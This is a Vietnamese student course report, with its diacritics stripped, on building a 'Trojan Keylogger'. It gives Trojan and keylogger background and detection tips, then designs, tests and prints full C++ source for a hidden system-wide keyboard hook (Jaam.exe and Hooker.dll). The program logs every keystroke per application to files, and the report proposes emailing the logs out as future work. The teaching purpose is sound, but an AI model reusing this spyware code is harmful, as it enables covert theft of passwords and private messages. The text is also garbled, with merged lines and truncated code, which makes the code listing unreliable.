báo cáo môn an toàn thông tin mạng

7/29/2019 bo co mn an ton thng tin mng

1/25

TRNG I HC BCH KHOA

KHOA CNG NGH THNG TIN

B MN MNG V TRUYN THNG

AN TON THNG TIN MNG ti 15:

Xy dng chng trnh

Trojan Keylogger

Gio vin hng dn : TS. NGUYN TN KHISinh vin thc hin : L PHAN SN ANH

NGUYN H HI NGNG PHAN MINH HILp : 08T4

Nhm : 12

Nng 2012


2/25

Bo Co An Ton Thng Tin Mng

MC LC

MC LC ....................................................................................................................2Chng 1. C S L THUYT .................................................................................3

1.1 Gii thiu ................................................................................................................31.2 Tm hiu v Trojan .................................................................................................5

1.2.1 Cc dng Trojans c bn: .................................................................................51.2.2 Mc ch ca nhng k vit ra nhng Trojans: .................................................51.2.3 Nhng con ng my tnh nn nhn nhim Trojan: ...................................61.2.4 Nhng cch nhn bit mt my tnh b nhim Trojan: ......................................6

1.3 Gii thiu v KeyLogger ........................................................................................71.3.1 KeyLogger l g? ..............................................................................................71.3.2 Phn loi KeyLogger: .......................................................................................71.3.3 Cch hot ng ca KeyLogger: .......................................................................8

1.4 Cch pht hin v phng chng ..............................................................................91.4.1 Cch pht hin Trojan: ......................................................................................91.4.2 Cch phng chng: .........................................................................................13

Chng 2. PHN TCH V THIT K CHNG TRNH ....................................142.1 M t bi ton .......................................................................................................142.2 Phn tch yu cu ..................................................................................................14

2.2.1 Yu cu v chc nng: ....................................................................................142.2.2 Yu cu v giao din ngi dng: ..................................................................142.2.3 Yu cu v tng thch: ..................................................................................14

2.3 Phn tch chc nng ..............................................................................................142.4 K thut Hook .......................................................................................................14

2.4.1 Gii thiu: .......................................................................................................142.4.2 Chui Hook: ...................................................................................................152.4.3 Th tc Hook: .................................................................................................152.4.4 Cch s dng Hook: .......................................................................................16

2.5 Thut ton .............................................................................................................172.5.1 Hm WriteStringToFile(char *txt): ................................................................172.5.2 Hm LogKeyboard: ........................................................................................17

Chng 3. TRIN KHAI NH GI KT QU ....................................................183.1 Mi trng trin khai ............................................................................................183.2 Kt qu chc nng chng trnh ...........................................................................183.3 u v nhc im .................................................................................................20

3.3.1 u im: .........................................................................................................203.3.2 Nhc im: ...................................................................................................20

3.4 Hng pht trin ...................................................................................................2020

TI LIU THAM KHO ..........................................................................................21PH LC ...................................................................................................................22

SVTH: Sn Anh Hi ng Minh Hi 08T42


3/25


Chng 1. C S L THUYT

1.1 Gii thiu

Mt Trojan l mt chng trnh nh chy ch n v gy hi cho my tnh.

Vi s tr gip ca Trojan, mt k tt cng c th d dng truy cp vo my

tnh ca nn nhn thc hin mt s vic nguy hi nh ly cp d liu, xa file, v

nhiu kh nng khc.

Cng ging nh Nga Thnh Troy trong thn thoi trng c v nh l mt

mn qu, nhng thc ra c cha lnh Hy Lp, bn chng chim thnh Troy. Trojan

l mt chng trnh dng vi rt, mt k lm ni gin trong my tnh ca bn gip

cho tn tin tc (hacker) iu khin my tnh ca bn, Trojan gip tn tin tc ly nhng

thng tin qu bu ca bn, thm ch hn c th xa hoc nh dng li c cng cabn na. Trojan c th nhim vo my ca bn qua tp tin gn km th in t m

bn v tnh ti v v chy th, hoc c ln trong nhng chng trnh tr chi,

nhng chng trnh m bn khng r ngun gc

moi rut c mt khu ca cc ch thu bao, hacker ni thng s dng

vi rt c h Trojan (vi rt thnh Troa) gi n cc thu bao cn tn cng thng qua

th in t (e-mail) di dng d liu nh km (File Attachment). Ch cn khi cc

ch thu bao v tnh m file ny, lp tc vi rt Trojan c kch ng v t ng sao



4/25


chp li tt c cc thng s v mt khu ca ch thu bao. Khng ch l mt khu truy

cp Intemet m ngay c n mt khu ca hm th in t cng d dng b nh cp.

Ngay sau khi ch thu bao kt ni Internet, vi rt Trojan s b mt sinh ra mt e- mail

v gi mt khu nh cp v cho tin tc. V sau mi ln thay i mt khu virusTrojan s tip tc lng l tun ca n cp ti mt a ch m hacker ni nh sn.

nh la nn nhn, tin tc lun tm cch ging ra nhng loi by ht

sc tinh vi. Tinh vi n ni khng t ch thu bao d rt k tnh nhng vn c sp

by nh thng. Ph bin nht l hacker ni i lt nhng t chc hay cng ty c uy

tn nh la ch thu bao bng chng trnh phn mm th ma Ghostmail. tin

tc d dng tho ra nhng e-mail mo danh vi ni dung: Hin gi tnh trng nh

cp mt khu thu bao ang rt ph bin. Khi nhn c nhng tin kiu nh vy, c

khng t thu bao d dng cn cu v c t nhin cho chy chng trnh vi rt

Trojan m khng h nhn thc c rng h ang t nguyn hin mnh thnh nn

nhn ca bn tin tc

Nh vy, khi Trojan c kch hot trn my ca bn v khi bn truy cp

Internet th Trojan c th ly mt khu truy cp mng, ly danh sch th in t v

thm ch c cu hnh my tnh ca bn gi cho mt a ch th in t ca tn tintc. Nhng nguy him hn, Trojan cn gi c a ch mng IP, l a ch m nh cung

cp dch v mng (ISP) gn cho bn lc truy cp; tn tin tc s s dng a ch IP ca

bn thit lp kt ni t my tnh ca hn ti my tnh ca bn qua mng Internet.

Trojan s ly thng tin, xa thng tin

Tc hi ca Trojan:

* Xo hay vit li cc d liu trn my tnh.* Lm hng chc nng ca cc tp.

* Ly nhim cc phn mm c tnh khc nh l virus.

* Ci t mng my c th b iu khin bi my khc hay dng my nhim gi th nhng lm.

* c ln cc thng tin cn thit v gi bo co n ni khc.

* n cp thng tin nh l mt khu v s th tn dng.

* c cc chi tit ti khon ngn hng v dng vo cc mc tiu phm ti.SVTH: Sn Anh Hi ng Minh Hi 08T4

4
http://npower.vn/tag/virus-trojan/http://npower.vn/tag/virus-trojan/http://npower.vn/tag/cai-dat-mang/http://npower.vn/tag/cai-dat-mang/http://npower.vn/tag/virus-trojan/http://npower.vn/tag/virus-trojan/


5/25


* Ci t ln cc phn mm cha c cho php.

1.2 Tm hiu v Trojan

K tn cng c th truy cp c vo cc my tnh b nhim Trojans khi

chng Online. Sau c th truy cp v iu khin ton b my tnh ca nn nhn, v

chng c kh nng s dng vo nhiu mc ch khc nhau.

1.2.1 Cc dng Trojans c bn:

* Remote Access Trojans Cho k tn cng kim sot ton b h thng t xa.

* Data-Sending Trojans Gi nhng thng tin nhy cm cho k tn cng.

* Destructive Trojans Ph hy h thng.

* Denied-of-Service DoS Attack Trojan: Trojans cho tn cng DoS.

* Proxy Trojans.

* HTTP, FTP Trojans - Trojan t to thnh HTTP hay FTP server k tn

cng khai thc li.

* Security Software Disable Trojan.

1.2.2 Mc ch ca nhng k vit ra nhng Trojans:

* Ly thng tin ca cc ti khon c nhn nh: Email, Password,

* Nhng d liu mt.

* Thng tin ti chnh: Ti khon ngn hng

* S dng my tnh ca nn nhn thc hin mt tc v no , nh tn

cng, scan, hay lm ngp h thng mng ca nn nhn.



6/25


1.2.3 Nhng con ng my tnh nn nhn nhim Trojan:

* Qua cc ng dng CHAT online nh IRC Interney Relay Chat.

* Qua cc file c nh km trn Mail

* Qua tng vt l nh trao i d liu qua USB, CD, HDD

* Khi chy mt file b nhim Trojan.

* Qua NetBIOS FileSharing.

* Qua nhng chng trnh nguy him.

* T nhng trang web khng tin tng hay nhng website cung cp phn mm

min ph.

* N c kh nng n trong cc ng dng bnh thng, khi chy ng dng

lp tc cng chy lun Trojans.

1.2.4 Nhng cch nhn bit mt my tnh b nhim Trojan:

* CD-ROM t ng m ra ng vo.

* My tnh c nhng du hiu l trn mn hnh.

* Hnh nn ca cc ca s Windows b thay i

* Cc vn bn t ng in.

* My tinh t ng thay i font ch v cc thit lp khc.

* Hnh nn my tnh t ng thay i v khng th i li.

* Chut tri, chut phi ln ln.

* Chut khng hin th trn mn hnh.

* Nt Start khng hin th.



7/25


1.3 Gii thiu v KeyLogger

1.3.1 KeyLogger l g?

Keylogger hay "trnh theo di thao tc bn phm" theo cch dch ra ting

Vit l mt chng trnh my tnh ban u c vit nhm mc ch theo di v ghi

li mi thao tc thc hin trn bn phm vo mt tp tin nht k (log) cho ngi ci

t n s dng. V chc nng mang tnh vi phm vo ring t ca ngi khc ny nn

cc trnh keylogger c xp vo nhm ccphn mm gin ip.

V sau, khi keylogger pht trin cao hn n khng nhng ghi li thao tc bn

phm m cn ghi li c cc hnh nh hin th trn mn hnh (screen) bng cch chp

(screen-shot) hoc quay phim (screen-capture) thm ch cn ghi nhn cch con

tr chut trn my tnh di chuyn.

1.3.2 Phn loi KeyLogger:

Keylogger bao gm hai loi, mt loi keyloggerphn cngv mt loi lphn

mm. Bi vit ny ni n loi phn mm.

Theo nhng ngilp trnh, keylogger vit ra vi ch c mt loi duy nht l

gip cc bn gim st con ci, ngi thn xem h lm g viPC, viinternet,

khichatvi ngi l. Nhng cch s dng v chc nng ca keylogger hin ti trn

th gii khin ngi ta thng hay phn loi keylogger theo mc nguy him bng

cc cu hi:

Nhim vo my khng qua ci t/Ci t vo my cc nhanh (quick install)?

C thuc tnh n/giu trn trnh qun l tin trnh (process manager) v trnh ci

t v g b chng trnh (Add or Remove Program)?

Theo di khng thng bo/PC b nhim kh t pht hin?

C thm chc nng Capturescreen hoc ghi li thao tc chut?

http://vi.wikipedia.org/wiki/Ti%E1%BA%BFng_Vi%E1%BB%87thttp://vi.wikipedia.org/wiki/Ti%E1%BA%BFng_Vi%E1%BB%87thttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81m_gi%C3%A1n_%C4%91i%E1%BB%87phttp://vi.wikipedia.org/wiki/M%C3%A0n_h%C3%ACnhhttp://vi.wikipedia.org/wiki/Chu%E1%BB%99thttp://vi.wikipedia.org/wiki/M%C3%A1y_t%C3%ADnhhttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_c%E1%BB%A9nghttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81mhttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81mhttp://vi.wikipedia.org/wiki/L%E1%BA%ADp_tr%C3%ACnhhttp://vi.wikipedia.org/wiki/PChttp://vi.wikipedia.org/wiki/Internethttp://vi.wikipedia.org/w/index.php?title=Chat&action=edit&redlink=1http://vi.wikipedia.org/wiki/Ti%E1%BA%BFng_Vi%E1%BB%87thttp://vi.wikipedia.org/wiki/Ti%E1%BA%BFng_Vi%E1%BB%87thttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81m_gi%C3%A1n_%C4%91i%E1%BB%87phttp://vi.wikipedia.org/wiki/M%C3%A0n_h%C3%ACnhhttp://vi.wikipedia.org/wiki/Chu%E1%BB%99thttp://vi.wikipedia.org/wiki/M%C3%A1y_t%C3%ADnhhttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_c%E1%BB%A9nghttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81mhttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81mhttp://vi.wikipedia.org/wiki/L%E1%BA%ADp_tr%C3%ACnhhttp://vi.wikipedia.org/wiki/PChttp://vi.wikipedia.org/wiki/Internethttp://vi.wikipedia.org/w/index.php?title=Chat&action=edit&redlink=1


8/25


Kh tho g?

C kh nng ly nhim, chng tt (kill process)?

C mi cu tr li "c", cho mt im. im cng cao, keylogger cng vt

khi mc chgim st (monitoring) n vi mc ch do thm(spying) v tnh nguy

him n cng cao. Keylogger c th c phn loi theo s im:

Loi s 1

Khng im: keylogger loi bnh thng; chy cng khai, c thng bo cho

ngi b theo di, ng vi mc ch gim st.

Loi s 2

Mt n hai im: keylogger nguy him; chy ngm, hng n mc ch do

thm nhiu hn l gim st (nguy hi n cc thng tin c nhn nh l ti khon c

nhn, mt khu, th tn dng v ngi dng khng bit).

Loi s 3

Ba n nm im: keylogger loi rt nguy him; n du hon ton theo di trn

mt phm vi rng, mc ch do thm r rng.

Loi s 4

Su im: keylogger nguy him nghim trng, thng c mang theo bi cc

trojan-virus cc k kh tho g, l loi keylogger nguy him nht. Chnh v vy (v

cng do ng thi l ng bn ca trojan-virus) n thng hay b cc chng trnh

chng virus tm thy v tiu dit.

1.3.3 Cch hot ng ca KeyLogger:

1.3.3.1 Thnh phn ca Keylogger

Thng thng, mt chng trnh keylogger s gm c ba phn chnh:

Chng trnh iu khin (Control Program): dng theo iu phi hot ng,

tinh chnh cc thit lp, xem cc tp tin nht k cho Keylogger. Phn ny l phn

c giu k nht ca keylogger, thng thng ch c th gi ra bng mt t hp

phm tt c bit.

http://vi.wikipedia.org/w/index.php?title=Gi%C3%A1m_s%C3%A1t&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=Do_th%C3%A1m&action=edit&redlink=1http://vi.wikipedia.org/wiki/Ch%C6%B0%C6%A1ng_tr%C3%ACnhhttp://vi.wikipedia.org/w/index.php?title=Gi%C3%A1m_s%C3%A1t&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=Do_th%C3%A1m&action=edit&redlink=1http://vi.wikipedia.org/wiki/Ch%C6%B0%C6%A1ng_tr%C3%ACnh


9/25


Tp tin hook, hoc l mt chng trnh monitor dng ghi nhn li cc thao

tc bn phm, capture screen (y l phn quan trng nht)

Tp tin nht k (log), ni cha ng/ghi li ton b nhng g hook ghi nhn

c.

Ngoi ra, ty theo loi c th c thm phn chng trnh bo v (guard,

protect), chng trnh thng bo (report)

1.3.3.2 Cch thc ci t vo my

Cc loi keylogger t 1 - 3 thng thng khi ci t vo my cng ging nh

mi chng trnh my tnh khc, u phi qua bc ci t. u tin n s ci t cc

tp tin dng hot ng vo mt th mc c bit (rt phc tp), sau ng k

cch thc hot ng ri i ngi dng thit lp thm cc ng dng. Sau n bt

u hot ng.

Loi keylogger s 4 c th vo thng my ca ngi dng b qua bc ci t,

dng tnh nng autorun cng chy vi h thng. Mt s loi t th (drop) mnh vo

cc chng trnh khc, khi ngi dng s dng cc chng trnh ny keylogger st ng chy theo.

1.3.3.3 Cch hot ng

Trong mt h thng (Windows, Linux, Mac), khi bm 1 phm trn bn phm,

bn phm s chuyn n thnh tnh hiu chuyn vo CPU. CPU s chuyn n ti h

iu hnh h iu hnh dch thnh ch hoc s cho chnh n hoc cc chng trnh

khc s dng.

Nhng khi trong h thng c keylogger, khng nhng ch c h iu hnh

theo di m c hook file/monitor program ca keylogger theo di n s ghi nhn v

dch li cc tnh hiu ghi vo tp tin nht k. ng thi n cn c th theo di c mn

hnh v thao tc chut.

1.4 Cch pht hin v phng chng

1.4.1 Cch pht hin Trojan:C ba nguyn l ca bt k chng trnh Trojan no:

http://vi.wikipedia.org/w/index.php?title=Th%C6%B0_m%E1%BB%A5c&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=Th%C6%B0_m%E1%BB%A5c&action=edit&redlink=1


10/25


- Mt trojan mun hot ng phi lng nghe cc request trn mt cng no

- Mt chng trnh ang chy s phi c TN trong Process List

- Mt chng trnh Trojan s lun chy cng lc khi my tnh khi ng.

1.4.1.1 Pht hin Port s dng bi Trojans:

- Dng cu lnh Netstat an trong windows bit h thng ang lng nghetrn cc port no.

+ Hnh di ta thy c port 7777 y l port ca Tini Trojan.

+ Ta thy port 8800 ang ch nghe v c my ang kt ni n, c thl ca Trojans.

- Dng phn mm Fport

- Dng phn mm TCPView

Ta c th xem ton b cc port ang s dng v chng trnh g ang s dngport no.

T y ta c th kim tra cc dch v mng vi nhng Port nghi ng ta c thdng Firewall ng li.



11/25




12/25


1.4.1.2 Cch pht hin cc chng trnh ang chy:

- Dng phn mm Process Viewer tt c cc Process s c hin th d cang chy ch n v khng hin trn Task Manager ca Windows.



13/25


1.4.1.3 Tm mt chng trnh chy lc khi ng:

- Trong Startup

- Trong Registry: a s s nm ti y: Chng ta s dng cu lnh Msconfig

trong Table Startup chng trnh no mun chy t ng s phi nm ti y.

Trong v d ny c file nc.exe chy lc khi ng v tr ca n l ti folderc:\vnexperts.net

1.4.2 Cch phng chng:

- Khng s dng cc phn mm khng tin tng (i khi tin tng vn b dnh

Trojans).

- Khng vo cc trang web nguy him, khng ci cc ActiveX v JavaScripttrn cc trang web bi c th s nh km Trojans.

- Ti quan trng l phi update OS thng xuyn.

- Ci phn mm dit virus uy tn nh: Kaspersky Internet Security, NortonInternet Security, v Mcafee Total Security. Sau khi ci cc phn mm ny bn hyupdate n thng xuyn.



14/25


Chng 2. PHN TCH V THIT K CHNG TRNH

2.1 M t bi ton

Xy dng mt chng trnh Trojan Keylogger c kh nng ghi li cc thao tc

bn phm ca cc chng trnh m ngi dng ang s dng.

2.2 Phn tch yu cu

2.2.1 Yu cu v chc nng:

Chng trnh ghi li ton b thao tc phm ca ngi dng v lu ra mt tp

tin vn bn.

2.2.2 Yu cu v giao din ngi dng:

y l chng trnh mang tnh cht gin ip nn s c chy n trong h

thng v khng c giao din ha, ngi dng ch c th xem qua Task Manager.

2.2.3 Yu cu v tng thch:

m bo c s tng tc tt nht vi window, trong chng trnh ny

chng em s dng ngn ng C++ trn mi trng Dev C++, Visual C++.

2.3 Phn tch chc nng

- Phn tch cc tin trnh, ca s ang nhp d liu.

- Ghi li ton b thao tc bn phm.

- Lu ra cc tp tin vn bn theo ngy thng v tn ng dng.

2.4 K thut Hook

2.4.1 Gii thiu:

Hook l mt k thut x l thng ip rt mnh cho php chng ta can thip

su vo cc tin trnh khc nhau, nhng n lm nh hng ti tc ca h thng,

nht l hook system-wide, v tt c cc s kin ca h thng s c nh hng ti

mt hm no , r rng iu ny lm h thng chm i ng k. V th ta ch hn



15/25


hook nhng thng ip tht cn thit v kt thc vic hook ngay khi khng dng n

na.

Cc m hnh Hook:

- Local hook: l k thut Hook dng by s kin ngay trong tin trnh ci

t.

- Remote hook: l k thut Hook cho php by cc s kin thuc tin trnh ca

ng dng khc. Trong m hnh ny li tn ti hai kiu hook khc :

+ Thread-specific : kiu Hook ny s by s kin ca mt lung c th.

+ System-wide : by s kin ca tt c cc lung trong tt c cc tin

trnh ang thi hnh trong h thng.

Thnh phn ca Hook:

Chui Hook

Th tc Hook

Cc kiu Hook

2.4.2 Chui Hook:

H thng c kh nng h tr nhiu kiu hook khc nhau, mi kiu li c quy

nh mt cch thc truy nhp khc nhau trong k thut iu khin thng ip. Do vy,

h thng duy tr mt chui cc hook cho mi mt kiu hook khc nhau.

Mt chui hook l mt danh sch cc con tr c bit, n c tr ti cc hm

CallBack gi l hook procedure (th tc hook). Nh vy khi mt s kin xut hin, h

thng s chuyn s kin ti cc th tc hook c tham chiu bi chui hook theoth t ln lt. V th phi thc hin xong th tc ny mi c gi th tc k tip.

2.4.3 Th tc Hook:

Th tc hook s l ni thc hin cc thao tc sau khi bt c mt s kin

mong mun. Cc th tc hook ph thuc vo cc kiu hook khc nhau m c cu trc,

chc nng khc nhau. C th tc ch c th iu khin thng ip, mt s khc c th

sa i thng ip, dng tin trnh ca thng ip, ngn cn thc hin hook tip theohoc a ti ca s cui cng



16/25


Th tc hook c dng chung nh sau:

LRESULT CALLBACK HookProc( int nCode, WPARAM wParam,

LPARAM lParam );

Trong :

- HookProc: l tn i din ca th tc hook c ci t

- nCode : y l m hook, n quyt nh ton b hot ng ca th tc hook,

m hook ph thuc vo kiu hook v mi kiu hook c gn cho mt k t thit

lp m hook.

- wParam, lParam: Hai tham s ny cha cc thng tin v thng ip c

hook v n ph thuc vo m hook (nCode).

2.4.4 Cch s dng Hook:

2.4.4.1 Ci t Hook

Ta c th ci t th tc hook vo chui hook bng vic gi hm

SetWindowsHookEx v ch ra kiu hook ang gi th tc, vic ci t hook c th

thc hin trn mi tin trnh trong h thng.

Nu s dng hook ton cc th phi t trong th vin lin kt ng (DLL).

ng dng mun s dng th vin lin kt ng phi ly c handle ca th vin .

nhn Handle ca th vin lin kt ng ta c th s dng hm LoadLibrary vi

tham s l tn ca th vin. Sau khi c c Handle ca DLL, ta s ly a ch ca th

tc hook trong th vin lin kt ng thng qua hm GetProcAddress. Sau khi c

th tc hook, s dng hm SetWindowsHookEx ci t th tc hook vo trong

chui hook.

2.4.4.2 Gii phng Hook

Nh ni th hook nn c b i nu nh khng cn thit na bng cch s

dng hm UnhookWindowsHookEx.

Vi thread-specific hook, vic s dng hm UnhookWindowsHookEx s gii

phng th tc hook. Tuy nhin vi hook ton tc (system-wide hook) th hm ny

khng th tr t do cho hm DLL. Vic gi hm LoadLibrary s gi trong ng cnh

ca tt c cc tin trnh, tuy nhin hm FreeLibrary th khng th thc hin vi cc



17/25


tin trnh khc. V vy, khng c cch no gii phng DLL. H thng ch c th

gii phng DLL khi tt c cc tin trnh lin kt ti DLL phi kt thc hoc gi

FreeLibrary.

Gii php t ra cho vn ny l xy dng hm ci t ngay trong th vinDLL. Bng vic lin kt ti DLL, ng dng c th ci t hook. V ngay trong DLL

cng phi c hm gii phng hook gii phng khi khng cn n na.

2.5 Thut ton

2.5.1 Hm WriteStringToFile(char *txt):

- Gi hm GetLocalTime(&st) ly thi gian ca h thng gn vo st.

- Gi hm GetForegroundWindow() ly a ch ca ca s ang s dng.

- Truyn a ch ca s va tm c vo hm GetWindowThreadProcessId

ly a ch ng dng ang chy vo bin processID.

- M (nu c) hoc to mi (nu cha c) mt file text vi tn l ngy v

tn ng dng ang chy.

sprintf(str,"d:\\key-%d_%d_%d-%s.txt" ,st.wYear,st.wMonth,st.wDay,GetExecutor(processID));out=fopen(str,"a");

- Ghi k t txt vo file va m.

2.5.2 Hm LogKeyboard:

- Khai bo 1 con tr keycode kiu KBDLLHOOKSTRUCT cha thng tin s

kin u vo ca bn phm.

- Nu phm bm l ci phm c bit th gi hm WriteStringToFile ghivo file nhng cm t tng ng vi phm .

if(keycode->vkCode == VK_RETURN) WriteStringToFile("{Enter}");if(keycode->vkCode == VK_BACK) WriteStringToFile("{Backspace}");

if(keycode->vkCode == VK_DELETE) WriteStringToFile("{Delete}"); if(keycode->vkCode == VK_HOME) WriteStringToFile("{Home}"); if(keycode->vkCode == VK_END) WriteStringToFile("{End}"); if(keycode->vkCode == VK_LEFT) WriteStringToFile("{Left}"); if(keycode->vkCode == VK_RIGHT) WriteStringToFile("{Right}"); if(keycode->vkCode == VK_UP) WriteStringToFile("{Up}"); if(keycode->vkCode == VK_DOWN) WriteStringToFile("{Down}");

- Cn li th ghi vo file vi k t tng ng ca phm bm .



18/25


Chng 3. TRIN KHAI NH GI KT QU

3.1 Mi trng trin khai

Phn mm c trin khai chy th trn cc phin bn ca Win7.

3.2 Kt qu chc nng chng trnh

Kt qu khi chy chng trnh.

Hnh 1 Chng trnh Jaam.exe chy ngm



19/25


Hnh 2 S dng ng dng Yahoo Messenger

Hnh 3 Kt qu ghi c t chng trnh

Hnh 4 Ni dung mt tp tin log



20/25


3.3 u v nhc im

Sau khi trin khai chy th ng dng, nhm chng em rt ra cc nhn xt nh

gi sau:3.3.1 u im:

- Chng trnh khng lm tng ng k thi gian hin th phm bm.

- Chng trnh ghi li c 100% thao tc phm.

- Cc tp tin ghi li theo ngy v ng dng m ngi s dng g phm thng

tin chnh xc 100%.

3.3.2 Nhc im:

- Vn cn k t l trong bn log. Nguyn nhn l do cc k t Unicode c

tr v t chng trnh Unikey.

- V chng trnh bt tt c thao tc bn phm ca tt c cc ng dng c

chy nn to ra hi nhiu file text d tha.

3.4 Hng pht trin

- To ra file cu hnh cho chng trnh Trojan c v x l bt phm bm

ca cc ng dng m ngi dng quan tm.

- Pht trin Trojan t gi thng tin v mail.



21/25


TI LIU THAM KHO

- Website wikipedia.org

- Software Requirement Specification Template IEEE

- An Analysis of the System

Salman A. Baset and Henning Schulzrinne

Department of Computer Science

Columbia University, New York NY 10027

{salman,hgs}@cs.columbia.edu

September 15, 2004



22/25


PH LC

Tp tin thi hnh Jaam.exe

#include"stdafx.h"#include

/* Declare Windows procedure */LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);

/* Make the class name into a global variable */char szClassName[ ] = "WindowsApp";

HINSTANCE hinstDLL;HHOOK hHook = NULL;typedefVOID (*LOADPROC)(HHOOK hHook);

int WINAPI WinMain (HINSTANCE hThisInstance,HINSTANCE hPrevInstance,LPSTR lpszArgument,

int nFunsterStil)

{hinstDLL = LoadLibrary(TEXT("Hooker"));

if(hinstDLL == NULL) { MessageBox(0,L"Not found.",L"Error",0); return 0; }

HOOKPROC hpr = (HOOKPROC)GetProcAddress(hinstDLL,"LogKeyboard"); if(hpr == NULL) { MessageBox(0,L"Unvail lib.",L"Error",0); return 0; }

hHook = SetWindowsHookEx(WH_KEYBOARD_LL, hpr, hinstDLL, 0); if(hHook == NULL) { MessageBox(0,L"Corrupt lib.",L"Error",0); return 0; }

LOADPROC lpr = (LOADPROC)GetProcAddress(hinstDLL,"SetGlobalHook");lpr(hHook);

HWND hwnd; /* This is the handle for our window */MSG messages; /* Here messages to the application are saved */

/* Run the message loop. It will run until GetMessage() returns 0 */ while (GetMessage (&messages, NULL, 0, 0))

{ /* Translate virtual-key messages into character messages */

TranslateMessage(&messages);

/* Send message to WindowProcedure */DispatchMessage(&messages);

}

/* The program return-value is 0 - The value that PostQuitMessage() gave */ return messages.wParam;}

/* This function is called by the Windows function DispatchMessage() */

LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam){

switch (message) /* handle the messages */{

case WM_DESTROY:



23/25


PostQuitMessage (0); /* send a WM_QUIT to the message queue */UnhookWindowsHookEx(hHook);hHook=NULL;break;

default: /* for messages that we don't deal with */ return DefWindowProc (hwnd, message, wParam, lParam);

}

return 0;}

Th vin Hooker.dll

// dllmain.cpp : Defines the entry point for the DLL application.#include#include#include#include#include

#include#include#include

#pragmadata_seg(".SHARDAT")HHOOK hGlobalHook = NULL;FILE *out;#pragmadata_seg()

int PrintModules( DWORD processID );void WriteStringToFile(char *txt);void WriteEnterToFile();

LRESULT CALLBACK LogKeyboard(int nCode, WPARAM wParam, LPARAM lParam){ if(nCode == HC_ACTION && wParam == WM_KEYDOWN)

{bool isDownShift = ((GetKeyState(VK_SHIFT) & 0x80) == 0x80 ? true : false);

bool isDownCapslock = (GetKeyState(VK_CAPITAL) != 0 ? true : false);

bool isDownCtrl = ((GetKeyState(VK_CONTROL) & 0x80) == 0x80 ? true : false);

byte keyState[256];GetKeyboardState(keyState);

WORD w;

KBDLLHOOKSTRUCT* keycode = (KBDLLHOOKSTRUCT*)lParam;if(keycode->vkCode == VK_RETURN) WriteStringToFile("{Enter}");if(keycode->vkCode == VK_BACK) WriteStringToFile("{Backspace}");

if(keycode->vkCode == VK_DELETE) WriteStringToFile("{Delete}"); if(keycode->vkCode == VK_HOME) WriteStringToFile("{Home}"); if(keycode->vkCode == VK_END) WriteStringToFile("{End}"); if(keycode->vkCode == VK_LEFT) WriteStringToFile("{Left}"); if(keycode->vkCode == VK_RIGHT) WriteStringToFile("{Right}"); if(keycode->vkCode == VK_UP) WriteStringToFile("{Up}"); if(keycode->vkCode == VK_DOWN) WriteStringToFile("{Down}"); elseif(ToAscii(keycode->vkCode,

keycode->scanCode,keyState,

&w,keycode->flags) == 1){

char key = (char)w;



24/25


if((isDownCapslock ^ isDownShift) && ((key >= 65 && key = 97 &&

key vkCode);WriteStringToFile(str);}

else { char str[100];

sprintf(str,"%c",key);WriteStringToFile(str);}

}

}

return CallNextHookEx( hGlobalHook, nCode, wParam, lParam );

}void SetGlobalHook(HHOOK hHook){

hGlobalHook = hHook;}

char* GetExecutor( DWORD processID ){

HMODULE hMods[1024];HANDLE hProcess;DWORD cbNeeded;

unsignedint i;char* result = (char*)malloc( 1000 );;

// Get a handle to the process.

hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |PROCESS_VM_READ,FALSE, processID );

if(NULL == hProcess) return"";

// Get a list of all the modules in this process.

if( EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)){

for ( i = 0; i < (cbNeeded / sizeof(HMODULE)); i++ )

{TCHAR szModName[MAX_PATH];

// Get the full path to the module's file.

if( GetModuleBaseName( hProcess, hMods[i], szModName, sizeof(szModName) / sizeof(TCHAR)))

{ // Print the module name and handle value.

TCHAR* prcName = szModName;wcstombs( result, szModName, 1000 );

}

break;}

}



25/25


// Release the handle to the process.

CloseHandle( hProcess );

return result;}

void WriteStringToFile(char* txt){ // File name by Time and App

// Curren TimeSYSTEMTIME st;GetLocalTime(&st);

// Current AppHWND curhwndWindow = GetForegroundWindow(); //lay dia chi cua so dang dungDWORD processID;GetWindowThreadProcessId(curhwndWindow, &processID);

char str[100];

sprintf(str,"d:\\key-%d_%d_%d-%s.txt" ,st.wYear,st.wMonth,st.wDay,GetExecutor(processID));

out=fopen(str,"a");fprintf(out,"%s",txt);fclose(out);

}

BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved

){

switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:

break;}return TRUE;

}

Documents

báo cáo môn an toàn thông tin mạng